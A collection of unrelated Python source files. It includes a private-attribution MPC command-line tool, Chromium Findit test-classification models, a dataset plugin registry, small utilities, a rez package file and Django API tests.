return OneDockerBinaryConfig(**onedocker_binary_config["constructor"])
def _build_onedocker_binary_cfg_map(
onedocker_binary_configs: Dict[str, Dict[str, Any]]
) -> DefaultDict[str, OneDockerBinaryConfig]:
onedocker_binary_cfg_map = defaultdict(
lambda: _build_onedocker_binary_cfg(onedocker_binary_configs["default"])
)
for binary_name, config in onedocker_binary_configs.items():
onedocker_binary_cfg_map[binary_name] = _build_onedocker_binary_cfg(config)
return onedocker_binary_cfg_map
def get_mpc(config: Dict[str, Any], instance_id: str, logger: logging.Logger) -> None:
container_service = _build_container_service(
config["private_attribution"]["dependency"]["ContainerService"]
)
storage_service = _build_storage_service(
config["private_attribution"]["dependency"]["StorageService"]
)
mpc_service = _build_mpc_service(
config["mpc"],
_build_onedocker_service_cfg(config["private_attribution"]["dependency"]["OneDockerServiceConfig"]),
container_service,
storage_service
)
# calling update_instance here to get the newest container information
instance = mpc_service.update_instance(instance_id)
logger.info(instance)
def _build_pid_service(
pid_config: Dict[str, Any],
onedocker_service: OneDockerService,
storage_service: StorageService,
onedocker_binary_config_map: DefaultDict[str, OneDockerBinaryConfig],
) -> PIDService:
pidinstance_repository_config = pid_config["dependency"]["PIDInstanceRepository"]
repository_class = reflect.get_class(pidinstance_repository_config["class"])
repository_service = repository_class(
**pidinstance_repository_config["constructor"]
)
return PIDService(
onedocker_service,
storage_service,
repository_service,
onedocker_binary_config_map,
)
def _build_storage_service(config: Dict[str, Any]) -> StorageService:
storage_class = reflect.get_class(config["class"])
return storage_class(**config["constructor"])
def create_instance(
config: Dict[str, Any],
instance_id: str,
role: PrivateComputationRole,
input_path: str,
output_dir: str,
hmac_key: str,
num_pid_containers: int,
num_mpc_containers: int,
num_files_per_mpc_container: int,
logger: logging.Logger,
padding_size: int,
concurrency: int = DEFAULT_CONCURRENCY,
k_anonymity_threshold: int = DEFAULT_K_ANONYMITY_THRESHOLD,
) -> None:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
instance = pa_service.create_instance(
instance_id=instance_id,
role=role,
input_path=input_path,
output_dir=output_dir,
hmac_key=hmac_key,
num_pid_containers=num_pid_containers,
num_mpc_containers=num_mpc_containers,
num_files_per_mpc_container=num_files_per_mpc_container,
padding_size=padding_size,
concurrency=concurrency,
k_anonymity_threshold=k_anonymity_threshold,
logger=logger,
)
logger.info(instance)
def id_match(
config: Dict[str, Any],
instance_id: str,
logger: logging.Logger,
server_ips: Optional[List[str]] = None,
dry_run: Optional[bool] = False,
) -> None:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
# run pid instance through pid service invoked from pa service
instance = pa_service.id_match(
instance_id=instance_id,
protocol=PIDProtocol.UNION_PID,
pid_config=config["pid"],
server_ips=server_ips,
dry_run=dry_run,
)
logger.info(instance)
def prepare_compute_input(
config: Dict[str, Any],
instance_id: str,
logger: logging.Logger,
dry_run: Optional[bool] = False,
log_cost_to_s3: bool = False,
) -> None:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
uploaded_files = pa_service.prepare_data(
instance_id=instance_id,
dry_run=dry_run,
log_cost_to_s3=log_cost_to_s3,
)
logging.info(f"Uploaded files: {uploaded_files}")
logging.info("Finished preparing data")
def compute_attribution(
config: Dict[str, Any],
instance_id: str,
game: str,
attribution_rule: str,
aggregation_type: str,
logger: logging.Logger,
server_ips: Optional[List[str]] = None,
dry_run: Optional[bool] = False,
log_cost_to_s3: bool = False,
) -> None:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
logging.info("Starting compute metrics...")
instance = pa_service.compute_attribute(
instance_id=instance_id,
game_name=game,
attribution_rule=attribution_rule,
aggregation_type=aggregation_type,
server_ips=server_ips,
dry_run=dry_run,
log_cost_to_s3=log_cost_to_s3,
)
logging.info("Finished running compute stage")
logger.info(instance)
def aggregate_shards(
config: Dict[str, Any],
instance_id: str,
game: str,
logger: logging.Logger,
server_ips: Optional[List[str]] = None,
dry_run: Optional[bool] = False,
log_cost_to_s3: bool = False,
) -> None:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
pa_service.update_instance(instance_id)
instance = pa_service.aggregate_shards(
instance_id=instance_id,
game=game,
server_ips=server_ips,
dry_run=dry_run,
log_cost_to_s3=log_cost_to_s3,
)
logger.info(instance)
def get_instance(
config: Dict[str, Any], instance_id: str, logger: logging.Logger
) -> PrivateComputationInstance:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
pa_instance = pa_service.update_instance(instance_id)
logger.info(pa_instance)
return pa_instance
def get_server_ips(
config: Dict[str, Any],
instance_id: str,
) -> List[str]:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
pa_instance = pa_service.update_instance(instance_id)
server_ips_list = None
last_instance = pa_instance.instances[-1]
if isinstance(last_instance, (PIDInstance, MPCInstance)):
server_ips_list = last_instance.server_ips
if not server_ips_list:
server_ips_list = []
print(*server_ips_list, sep=",")
return server_ips_list
def print_instance(
config: Dict[str, Any],
instance_id: str,
logger: logging.Logger) -> None:
print(get_instance(config, instance_id, logger))
def main() -> None:
s = schema.Schema(
{
"create_instance": bool,
"get_instance": bool,
"print_instance": bool,
"id_match": bool,
"prepare_compute_input": bool,
"compute_attribution": bool,
"aggregate_shards": bool,
"get_server_ips": bool,
"<instance_id>": schema.Or(None, str),
"--config": schema.And(schema.Use(PurePath), os.path.exists),
"--input_path": schema.Or(None, str),
"--output_dir": schema.Or(None, str),
"--game": schema.Or(None, str),
"--aggregation_type": schema.Or(None, str),
"--attribution_rule": schema.Or(None, str),
"--num_pid_containers": schema.Or(None, schema.Use(int)),
"--num_mpc_containers": schema.Or(None, schema.Use(int)),
"--num_files_per_mpc_container": schema.Or(None, schema.Use(int)),
"--padding_size": schema.Or(None, schema.Use(int)),
"--role": schema.Or(
None,
schema.And(
schema.Use(str.upper),
lambda s: s in ("PUBLISHER", "PARTNER"),
schema.Use(PrivateComputationRole),
),
),
"--k_anonymity_threshold": schema.Or(None, schema.Use(int)),
"--server_ips": schema.Or(None, schema.Use(lambda arg: arg.split(","))),
"--concurrency": schema.Or(None, schema.Use(int)),
"--hmac_key": schema.Or(None, str),
"--dry_run": bool,
"--log_path": schema.Or(None, schema.Use(Path)),
"--log_cost_to_s3": schema.Or(None, schema.Use(bool)),
"--verbose": bool,
"--help": bool,
}
)
arguments = s.validate(docopt(__doc__))
config = yaml.load(Path(arguments["--config"]))
log_path = arguments["--log_path"]
log_level = logging.DEBUG if arguments["--verbose"] else logging.INFO
logging.basicConfig(
filename=log_path,
level=log_level,
format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s",
)
logger = logging.getLogger(__name__)
instance_id = arguments["<instance_id>"]
if arguments["create_instance"]:
logger.info(f"Create instance: {instance_id}")
# Optional arguments
hmac_key: Optional[str] = arguments["--hmac_key"]
padding_size: Optional[int] = arguments["--padding_size"]
concurrency: Optional[int] = arguments["--concurrency"]
k_anonymity_threshold: Optional[int] = arguments["--k_anonymity_threshold"]
create_instance(
instance_id=instance_id,
config=config,
input_path=arguments["--input_path"],
output_dir=arguments["--output_dir"],
role=arguments["--role"],
hmac_key=hmac_key or DEFAULT_HMAC_KEY,
num_pid_containers=arguments["--num_pid_containers"],
num_mpc_containers=arguments["--num_mpc_containers"],
num_files_per_mpc_container=arguments["--num_files_per_mpc_container"],
padding_size=padding_size or DEFAULT_PADDING_SIZE,
concurrency=concurrency or DEFAULT_CONCURRENCY,
k_anonymity_threshold=k_anonymity_threshold
or DEFAULT_K_ANONYMITY_THRESHOLD,
logger=logger,
)
elif arguments["get_instance"]:
logger.info(f"Get instance: {instance_id}")
get_instance(
config=config,
instance_id=instance_id,
logger=logger,
)
elif arguments["id_match"]:
logger.info(f"Run id match on instance: {instance_id}")
id_match(
config=config,
instance_id=instance_id,
logger=logger,
server_ips=arguments["--server_ips"],
dry_run=arguments["--dry_run"],
)
elif arguments["prepare_compute_input"]:
logger.info(f"Run id match on instance: {instance_id}")
prepare_compute_input(
config=config,
instance_id=instance_id,
logger=logger,
dry_run=arguments["--dry_run"],
log_cost_to_s3=arguments["--log_cost_to_s3"],
)
elif arguments["compute_attribution"]:
logger.info(f"Compute instance: {instance_id}")
compute_attribution(
config=config,
instance_id=instance_id,
game=arguments["--game"],
attribution_rule=arguments["--attribution_rule"],
aggregation_type=arguments["--aggregation_type"],
server_ips=arguments["--server_ips"],
logger=logger,
dry_run=arguments["--dry_run"],
log_cost_to_s3=arguments["--log_cost_to_s3"],
)
elif arguments["aggregate_shards"]:
aggregate_shards(
config=config,
instance_id=instance_id,
game=arguments["--game"],
server_ips=arguments["--server_ips"],
logger=logger,
dry_run=arguments["--dry_run"],
log_cost_to_s3=arguments["--log_cost_to_s3"],
)
elif arguments["get_server_ips"]:
get_server_ips(
config=config,
instance_id=instance_id,
)
elif arguments["print_instance"]:
print_instance(
config=config,
instance_id=instance_id,
logger=logger,
)
if __name__ == "__main__":
main()
|
import datetime as dt
import logging
from typing import Union
logger = logging.getLogger(__name__)
def get_monday(date: Union[dt.date, dt.datetime]):
if isinstance(date, dt.datetime):
date = date.date()
return date - dt.timedelta(days=date.weekday())
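# --- Usage sketch (not part of the original module) ---
if __name__ == "__main__":
    assert get_monday(dt.date(2021, 9, 15)) == dt.date(2021, 9, 13)  # a Wednesday maps to its Monday
    assert get_monday(dt.datetime(2021, 9, 13, 8, 30)) == dt.date(2021, 9, 13)  # a Monday maps to itself
    print(get_monday(dt.date.today()))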
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
def has_module(module):
try:
__import__(module)
return True
except ImportError:
return False
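# --- Usage sketch (not part of the original module) ---
if __name__ == '__main__':
    print(has_module('json'))                        # True: part of the standard library
    print(has_module('module_that_does_not_exist'))  # False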
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from collections import defaultdict
from google.appengine.ext import ndb
from libs import time_util
from model.base_build_model import BaseBuildModel
from model.base_swarming_task import BaseSwarmingTask
class _ResultCount(ndb.Model):
"""Represent one result status and the count."""
status = ndb.StringProperty(indexed=False)
count = ndb.IntegerProperty(indexed=False)
class _ClassifiedTestResult(ndb.Model):
"""Represents classified result of one test."""
test_name = ndb.StringProperty(indexed=False)
# Total runs of the test in a rerun.
total_run = ndb.IntegerProperty(indexed=False)
# Number of runs with expected result.
num_expected_results = ndb.IntegerProperty(indexed=False)
# Number of runs with unexpected result.
num_unexpected_results = ndb.IntegerProperty(indexed=False)
# All the passing status and their counts.
passes = ndb.LocalStructuredProperty(
_ResultCount, repeated=True, compressed=True)
# All the failing status and their counts.
failures = ndb.LocalStructuredProperty(
_ResultCount, repeated=True, compressed=True)
# All the skipping status and their counts.
skips = ndb.LocalStructuredProperty(
_ResultCount, repeated=True, compressed=True)
# All the unknown status and their counts.
unknowns = ndb.LocalStructuredProperty(
_ResultCount, repeated=True, compressed=True)
# All the not run status and their counts.
notruns = ndb.LocalStructuredProperty(
_ResultCount, repeated=True, compressed=True)
@staticmethod
def _GetResultList(results):
return [
_ResultCount(status=status, count=count)
for status, count in results.iteritems()
]
@classmethod
def FromClassifiedTestResultObject(cls, test_name, classified_results):
result = cls()
result.test_name = test_name
result.total_run = classified_results.total_run
result.num_expected_results = classified_results.num_expected_results
result.num_unexpected_results = classified_results.num_unexpected_results
result.passes = cls._GetResultList(classified_results.results.passes)
result.failures = cls._GetResultList(classified_results.results.failures)
result.skips = cls._GetResultList(classified_results.results.skips)
result.unknowns = cls._GetResultList(classified_results.results.unknowns)
result.notruns = cls._GetResultList(classified_results.results.notruns)
return result
class WfSwarmingTask(BaseBuildModel, BaseSwarmingTask):
"""Represents a swarming task for a failed step.
'Wf' is short for waterfall.
"""
def _GetClassifiedTestsFromLegacyTestStatuses(self):
"""Classifies tests into lists of reliable and flaky tests from
legacy test statuses.
example legacy test statuses:
{
'test1': {
'total_run': 2,
'SUCCESS': 2
},
'test2': {
'total_run': 4,
'SUCCESS': 2,
'FAILURE': 2
},
'test3': {
'total_run': 6,
'FAILURE': 6
},
'test4': {
'total_run': 6,
'SKIPPED': 6
},
'test5': {
'total_run': 6,
'UNKNOWN': 6
}
}
example classified tests:
{
'flaky_tests': ['test1', 'test2'],
'reliable_tests': ['test3', 'test4'],
'unknown_tests': ['test5']
}
"""
tests = defaultdict(list)
for test_name, test_statuses in self.tests_statuses.iteritems():
if test_statuses.get('SUCCESS'): # Test passed for some runs, flaky.
tests['flaky_tests'].append(test_name)
elif test_statuses.get('UNKNOWN'):
tests['unknown_tests'].append(test_name)
else:
# Here we consider a 'non-flaky' test to be 'reliable'.
# If the test is 'SKIPPED', there should be a failure in its dependency,
# so we consider it to be failed as well.
# TODO(chanli): Check more test statuses.
tests['reliable_tests'].append(test_name)
return tests
@property
def classified_tests(self):
"""Classifies tests into lists of reliable and flaky tests.
The swarming task is for deflake purpose, meaning Findit runs the task on
failed tests that it finds on waterfall.
So the classification should be:
* Flaky failure: Any test run succeeded or resulted in an expected status.
* Unknown failure: Test is not flaky, and any test run ended with an
unknown status.
* Reliable failure: All test runs failed or skipped unexpectedly.
example classified tests:
{
'flaky_tests': ['test1'],
'reliable_tests': ['test3'],
'unknown_tests': ['test2']
}
"""
if not self.classified_test_results:
return self._GetClassifiedTestsFromLegacyTestStatuses()
tests = defaultdict(list)
for classified_test_result in self.classified_test_results:
test_name = classified_test_result.test_name
if (classified_test_result.num_expected_results > 0 or
classified_test_result.passes):
# There are expected or successful runs for a test that failed on
# waterfall, so we classify the test as flaky.
tests['flaky_tests'].append(test_name)
elif classified_test_result.unknowns or classified_test_result.notruns:
tests['unknown_tests'].append(test_name)
else:
# Here we consider a 'non-flaky' test to be 'reliable'.
# If the test has skipping results, there should be a failure in its
# dependency, so we consider it to be failed as well.
tests['reliable_tests'].append(test_name)
return tests
@property
def reliable_tests(self):
return self.classified_tests.get('reliable_tests', [])
@property
def flaky_tests(self):
return self.classified_tests.get('flaky_tests', [])
@property
def reproducible_flaky_tests(self):
tests = []
if not self.classified_test_results:
# For Legacy data.
for test_name, test_statuses in self.tests_statuses.iteritems():
if (test_statuses.get('SUCCESS') and
test_statuses['SUCCESS'] < test_statuses['total_run']):
# Test has passed and not passed runs, confirmed to be flaky.
tests.append(test_name)
return tests
for classified_test_result in self.classified_test_results:
test_name = classified_test_result.test_name
if (classified_test_result.num_expected_results > 0 and
classified_test_result.num_unexpected_results > 0):
# Test has expected and unexpected runs, confirmed to be flaky.
tests.append(test_name)
return tests
@ndb.ComputedProperty
def step_name(self):
return self.key.pairs()[1][1]
@staticmethod
def _CreateKey(master_name, builder_name, build_number,
step_name): # pragma: no cover
build_key = BaseBuildModel.CreateBuildKey(master_name, builder_name,
build_number)
return ndb.Key('WfBuild', build_key, 'WfSwarmingTask', step_name)
@staticmethod
def Create(master_name, builder_name, build_number,
step_name): # pragma: no cover
task = WfSwarmingTask(
key=WfSwarmingTask._CreateKey(master_name, builder_name, build_number,
step_name))
task.parameters = task.parameters or {}
task.tests_statuses = task.tests_statuses or {}
task.requested_time = time_util.GetUTCNow()
return task
@staticmethod
def Get(master_name, builder_name, build_number,
step_name): # pragma: no cover
return WfSwarmingTask._CreateKey(master_name, builder_name, build_number,
step_name).get()
@staticmethod
def GetClassifiedTestResults(results):
"""Gets classified test results and populates data to
_ClassifiedTestResults.
Args:
results(ClassifiedTestResults): A plain dict-like object for classified
test results.
"""
return [
_ClassifiedTestResult.FromClassifiedTestResultObject(test_name, result)
for test_name, result in results.iteritems()
]
# Classified test results.
classified_test_results = ndb.LocalStructuredProperty(
_ClassifiedTestResult, repeated=True, compressed=True)
|
from __future__ import annotations
from abc import ABC
from typing import Callable, Dict, Iterable, Optional, Union
from datasets._typing import ColumnNames
from datasets.context import Context
from datasets.utils import _is_upper_pascal_case
from .mode import Mode
from .program_executor import ProgramExecutor
class DatasetPlugin(ABC):
"""
All dataset plugins derive from this class.
To register as a dataset, a plugin class must be decorated with (or directly call) DatasetPlugin.register().
"""
_executor: ProgramExecutor
# Context -> constructor_keys -> dataset plugin
_plugins: Dict[Context, Dict[frozenset[str], DatasetPlugin]] = {}
_META_COLUMNS = ["run_id"]
def __init__(
self,
name: str,
logical_key: Optional[str] = None,
columns: Optional[ColumnNames] = None,
run_id: Optional[str] = None,
mode: Union[Mode, str] = Mode.READ,
):
"""
:param name: The dataset logical name.
:param logical_key:
The logical primary key, strongly suggested, and can later be
used when creating Hive/Dynamo tables or registering with a Catalog.
:param columns: Fetch columns
:param run_id: The program run_id partition to select from.
:param mode: The data access read/write mode
"""
dataset_name_validator(name)
self.name = name
self.key = logical_key # TODO: validate this too!
self.mode: Mode = mode if isinstance(mode, Mode) else Mode[mode]
self.columns = columns
self.run_id = run_id
@classmethod
def from_keys(cls, context: Optional[Union[Context, str]] = None, **kwargs) -> DatasetPlugin:
"""
Factory method for datasets. Not directly used by the user.
For example usage please see test_from_keys*() unit tests.
:param context: If not specified it uses the current executor context.
:param kwargs: dataset constructor args
:return: found DatasetPlugin
"""
dataset_args = set(kwargs.keys())
context_lookup = cls._get_context(context)
default_plugin: Optional[DatasetPlugin] = None
max_intersect_count = 0
ret_plugin = None
for plugin_context in (
plugin_context for plugin_context in cls._plugins.keys() if context_lookup & plugin_context
):
for plugin_constructor_keys, plugin in cls._plugins[plugin_context].items():
if plugin_constructor_keys.issubset(dataset_args):
if plugin_constructor_keys == {"name"}:
default_plugin = plugin
else:
match_count = len(plugin_constructor_keys.intersection(dataset_args))
if match_count > max_intersect_count:
max_intersect_count = match_count
ret_plugin = plugin
if ret_plugin:
return ret_plugin(**kwargs)
elif default_plugin:
return default_plugin(**kwargs)
else:
raise ValueError(f"f{kwargs} and {context_lookup=} not found in {cls._plugins}")
@classmethod
def _get_context(cls, context: Optional[Union[Context, str]] = None) -> Context:
if context:
return context if isinstance(context, Context) else Context[context]
else:
return cls._executor.context
@classmethod
def register(cls, constructor_keys: set[str], context: Context) -> Callable:
"""
Registration method for a dataset plugin.
Plugins are looked up by (constructor_keys, context), so no two plugins can be registered with the same pair.
Plugins are constructed by from_keys(), by ensuring that the current
ProgramExecutor.context == plugin.context
and that plugin.constructor_keys.issubset(dataset_arguments)
constructor_keys="name" is a special case and is loaded last if no other plugins are found
:param constructor_keys: set of dataset constructor keys
:param context: defaults to batch, but is the context this plugin supports
:return: decorated class
"""
if constructor_keys is None:
raise ValueError("constructor_keys cannot be None!")
if context is None:
raise ValueError("context cannot be None!")
if not isinstance(context, Context):
raise ValueError(f"{context=} is not of type(Context)!")
def inner_wrapper(wrapped_class: DatasetPlugin) -> DatasetPlugin:
if context not in cls._plugins:
cls._plugins[context] = {}
keys = frozenset(constructor_keys)
if keys in cls._plugins[context] and wrapped_class != cls._plugins[context][keys]:
raise ValueError(
f"{constructor_keys} already registered as a " f"dataset plugin as {context}!"
)
cls._plugins[context][keys] = wrapped_class
return wrapped_class
return inner_wrapper
@classmethod
def register_executor(cls, executor: ProgramExecutor):
cls._executor = executor
def _get_read_columns(self, columns: Optional[ColumnNames] = None) -> Optional[Iterable[str]]:
read_columns = columns if columns else self.columns
if read_columns is not None and isinstance(read_columns, str):
read_columns = read_columns.split(",")
return read_columns
def __repr__(self):
return f"DatasetPlugin({self.name=},{self.mode=},{self.key=},{self.columns=})"
def _validate_dataset_name(name: str):
if not _is_upper_pascal_case(name):
raise ValueError(
f"'{name}' is not a valid Dataset name. "
f"Please use Upper Pascal Case syntax: https://en.wikipedia.org/wiki/Camel_case"
)
dataset_name_validator: Callable = _validate_dataset_name
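# --- Registration sketch (not part of the original module) ---
# A hypothetical plugin keyed on {"name", "query"}; Context.BATCH is assumed to
# be a valid Context member (the register() docstring mentions a batch default).
@DatasetPlugin.register(constructor_keys={"name", "query"}, context=Context.BATCH)
class QueryDataset(DatasetPlugin):
    def __init__(self, name: str, query: str, **kwargs):
        super().__init__(name=name, **kwargs)
        self.query = query  # hypothetical extra constructor key


if __name__ == "__main__":
    # from_keys() picks QueryDataset because {"name", "query"} matches the kwargs.
    ds = DatasetPlugin.from_keys(context=Context.BATCH, name="MyDataset", query="SELECT 1")
    print(ds)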
|
import re, math
import pandas as pd
import gcsfs as gcsfs
def read_csv_gcs(filename, header=None):
# # read file from gcs
# fs = gcsfs.GCSFileSystem(project='careerograph-e9963')
# with fs.open(filename) as f:
# df = pd.read_csv(f,header=header)
# return df
return True
# performs preprocessing on a list of skills
def preprocess_skillset(skillset):
tempSkillset = list()
for skill in skillset:
# remove the trailing space, replace space with underscore,
skill = skill.strip()
skill = skill.replace(" ", "_")
skill = re.sub(r'\W+', '_', skill)
tempSkillset.append(skill.lower())
return tempSkillset
def create_idf(map, skills, count):
idf = list()
# get idf for each skill
for skill in skills:
idf.append(math.log(count/map[skill]))
return idf
def create_mapping(skillset):
# create mapping for every skill and its count ex: html: 2
mapping = dict()
for skill in skillset:
if skill not in mapping:
mapping[skill] = 1
else:
mapping[skill] += 1
return mapping
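# --- Usage sketch (not part of the original module) ---
# A tiny hypothetical skill corpus; counts and IDF values are computed in memory.
if __name__ == "__main__":
    raw_skills = ["HTML ", "html", "Machine Learning", "C++"]
    cleaned = preprocess_skillset(raw_skills)   # ['html', 'html', 'machine_learning', 'c_']
    counts = create_mapping(cleaned)            # {'html': 2, 'machine_learning': 1, 'c_': 1}
    idf = create_idf(counts, list(counts.keys()), len(cleaned))
    print(dict(zip(counts.keys(), idf)))
|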
import pandas as pd
import time
import math
import pdb
import os
import gc
class Logger:
def __init__(self):
self.d = []
self.num_rows = 0
def log(self, info):
self.d.append(info)
def save(self, path, append=True):
df = pd.DataFrame(self.d).apply(pd.to_numeric, errors='coerce', downcast='float')
df.index += self.num_rows
self.num_rows += len(df)
df.to_hdf(path + '.h5', key='log', append=append, format='table')
if append:
self.d.clear()
class Progress:
def __init__(self, total, name = 'Progress', ncol=3, max_length=20, indent=0, line_width=100, speed_update_freq=100):
self.total = total
self.name = name
self.ncol = ncol
self.max_length = max_length
self.indent = indent
self.line_width = line_width
self._speed_update_freq = speed_update_freq
self._step = 0
self._prev_line = '\033[F'
self._clear_line = ' ' * self.line_width
self._pbar_size = self.ncol * self.max_length
self._complete_pbar = '#' * self._pbar_size
self._incomplete_pbar = ' ' * self._pbar_size
self.lines = ['']
self.fraction = '{} / {}'.format(0, self.total)
self.resume()
def update(self, n=1):
self._step += n
if self._step % self._speed_update_freq == 0:
self._time0 = time.time()
self._step0 = self._step
def resume(self):
self._skip_lines = 1
print('\n', end='')
self._time0 = time.time()
self._step0 = self._step
def pause(self):
self._clear()
self._skip_lines = 1
def set_description(self, params=[]):
############
# Position #
############
self._clear()
###########
# Percent #
###########
percent, fraction = self._format_percent(self._step, self.total)
self.fraction = fraction
#########
# Speed #
#########
speed = self._format_speed(self._step)
##########
# Params #
##########
num_params = len(params)
nrow = math.ceil(num_params / self.ncol)
params_split = self._chunk(params, self.ncol)
params_string, lines = self._format(params_split)
self.lines = lines
description = '{} | {}{}'.format(percent, speed, params_string)
print(description)
self._skip_lines = nrow + 1
def append_description(self, descr):
self.lines.append(descr)
def _clear(self):
position = self._prev_line * self._skip_lines
empty = '\n'.join([self._clear_line for _ in range(self._skip_lines)])
print(position, end='')
print(empty)
print(position, end='')
def _format_percent(self, n, total):
if total:
percent = n / float(total)
complete_entries = int(percent * self._pbar_size)
incomplete_entries = self._pbar_size - complete_entries
pbar = self._complete_pbar[:complete_entries] + self._incomplete_pbar[:incomplete_entries]
fraction = '{} / {}'.format(n, total)
string = '{} [{}] {:3d}%'.format(fraction, pbar, int(percent*100))
else:
fraction = '{}'.format(n)
string = '{} iterations'.format(n)
return string, fraction
def _format_speed(self, n):
num_steps = n - self._step0
t = time.time() - self._time0
speed = num_steps / t
string = '{:.1f} Hz'.format(speed)
if num_steps > 0:
self._speed = string
return string
def _chunk(self, l, n):
return [l[i:i+n] for i in range(0, len(l), n)]
def _format(self, chunks):
lines = [self._format_chunk(chunk) for chunk in chunks]
lines.insert(0,'')
padding = '\n' + ' '*self.indent
string = padding.join(lines)
return string, lines
def _format_chunk(self, chunk):
line = ' | '.join([self._format_param(param) for param in chunk])
return line
def _format_param(self, param):
k, v = param
return '{} : {}'.format(k, v)[:self.max_length]
def stamp(self):
if self.lines != ['']:
params = ' | '.join(self.lines)
string = '[ {} ] {}{} | {}'.format(self.name, self.fraction, params, self._speed)
self._clear()
print(string, end='\n')
self._skip_lines = 1
else:
self._clear()
self._skip_lines = 0
def close(self):
self.pause()
class Silent:
def __init__(self, *args, **kwargs):
pass
def __getattr__(self, attr):
return lambda *args: None
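# Minimal usage sketch for the Progress helper above (a sketch only; it assumes `time` and
# `math` are already imported near the top of this module, since the class methods use them,
# and the numbers are illustrative):
#
#     progress = Progress(total=1000, name='Training')
#     for step in range(1000):
#         progress.update()
#         progress.set_description(params=[('loss', 0.123), ('lr', 1e-4)])
#     progress.stamp()
#     progress.close()
#
# `Silent` exposes the same interface as no-ops, so it can be swapped in for `Progress`
# to disable all output without changing the calling code.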
|
"""Implementation of a stack."""
from linked_list import LinkedList
class Stack(object):
"""Class for a stack."""
def __init__(self, iterable=None):
"""Function to create an instance of a stack."""
self.length = 0
self._stack = LinkedList()
self.top = None
if isinstance(iterable, (str, tuple, list)):
for i in iterable:
self.push(i)
    def pop(self):
        """Remove the head of the list and return its value."""
        if self.top is None:
            raise IndexError("List is empty, cannot pop from an empty list")
        val = self.top.val
        self.top = self.top.next_node
        # keep the wrapped LinkedList in sync so __len__ stays correct
        self._stack.head = self.top
        self._stack.length -= 1
        self.length -= 1
        return val
def push(self, val):
"""Use push method from LinkedList."""
self._stack.push(val)
self.top = self._stack.head
def __len__(self):
"""Redifine the built in len function for the list."""
return self._stack.length
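# Minimal usage sketch (a sketch only; it assumes the sibling `linked_list` module is
# importable, as it already is for the class above):
if __name__ == '__main__':
    stack = Stack([1, 2, 3])
    assert len(stack) == 3
    assert stack.pop() == 3  # the value pushed last comes off first
    stack.push(4)
    assert len(stack) == 3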
|
"""Implementation of the clear command."""
from mcipc.rcon.client import Client
__all__ = ['clear']
def clear(self: Client, player: str = None, item_name: str = None,
data: int = None, max_count: int = None) -> str:
"""Clears items from player inventory, including
items being dragged by the player.
Bedrock Edition implementation.
"""
return self.run('clear', player, item_name, data, max_count)
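# Minimal usage sketch (a sketch only; it assumes `client` is an already connected and
# authenticated RCON Client, and the player/item names below are placeholders):
#
#     response = clear(client, 'Steve', 'dirt')
#     print(response)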
|
default_app_config = 'event.providers.eventbrite_provider.apps.EventbriteProviderConfig'
|
# -*- coding: utf-8 -*-
name = 'colourise'
version = '0.4.0'
description = (
    'If output is to a terminal, colourise the piped input '
    'text based on some rules.'
)
authors = ['WWFX UK']
# Technically needs bash. Tested rez on Linux and OSX CI with bash
requires = ['platform-linux|osx']
tools = ['colourise', 'colour-test'] # Names of executables from this package
# ---- OR ----
# @late()
# def tools():
# """Dynamically get a list of binaries/wrappers from our bin folder.
#
# Returns:
# list[str]: Names of binaries from the bin folder.
# """
# import os
# exe_names = []
#
# for name in os.listdir(this.root):
# full_path = os.path.join(this.root, name)
# if os.access(full_path, os.X_OK) and not os.path.isdir(full_path):
# exe_names.append(name)
#
# return exe_names
# # Technically needs tar, gzip and curl but they tend to come with OS
# build_requires = [] # Build-time packages required by this package
# To Do: Fails on Windows, rez will run build_command with cmd
build_command = r'''
set -euf -o pipefail
if [[ $REZ_BUILD_INSTALL -eq 1 ]]
then
cp -v \
$REZ_BUILD_SOURCE_PATH/colourise \
$REZ_BUILD_SOURCE_PATH/colour-test \
$REZ_BUILD_INSTALL_PATH
fi
'''
def commands():
"""Commands to set up environment for ``rez env colourise``"""
env.PATH.append('{root}')
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag, Recipe
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
"""Test the publicly available Tags API"""
def setUp(self):
self.client = APIClient()
def test_auth_required(self):
"""Test that authentication is required for retrieving tags"""
response = self.client.get(TAGS_URL)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Test the authorised user Tags API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
'random@random.com',
'Password1'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
"""Test retrieve tags"""
# Given
Tag.objects.create(user=self.user, name='Dessert')
Tag.objects.create(user=self.user, name='Starter')
# When
response = self.client.get(TAGS_URL)
# Then the request is successful
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Then the tags are returned
expected_tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(expected_tags, many=True)
expected_data = serializer.data
self.assertEqual(response.data, expected_data)
def test_retrieve_tags_only_for_user(self):
"""Test retrieve on tags for authenticated user only"""
# Given authenticated user has a tag
expected_tag = Tag.objects.create(user=self.user, name='Dairy Free')
# Given another user also has a tag
other_user = get_user_model().objects.create_user(
'other_user@random.com',
'MOCK_OTHER_PASSWORD'
)
Tag.objects.create(user=other_user, name='MOCK_OTHER_TAG_NAME')
# When
response = self.client.get(TAGS_URL)
# Then the request is successful
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Then only the tags belonging to the auth'd user are returned
self.assertEqual(len(response.data), 1)
self.assertEqual(response.data[0]['name'], expected_tag.name)
def test_create_tag_success(self):
"""Test create a new tag"""
# Given
payload = {'name': 'TAG_NAME'}
# When
self.client.post(TAGS_URL, payload)
# Then
exists = Tag.objects.filter(
user=self.user,
name=payload['name']
).exists()
self.assertTrue(exists)
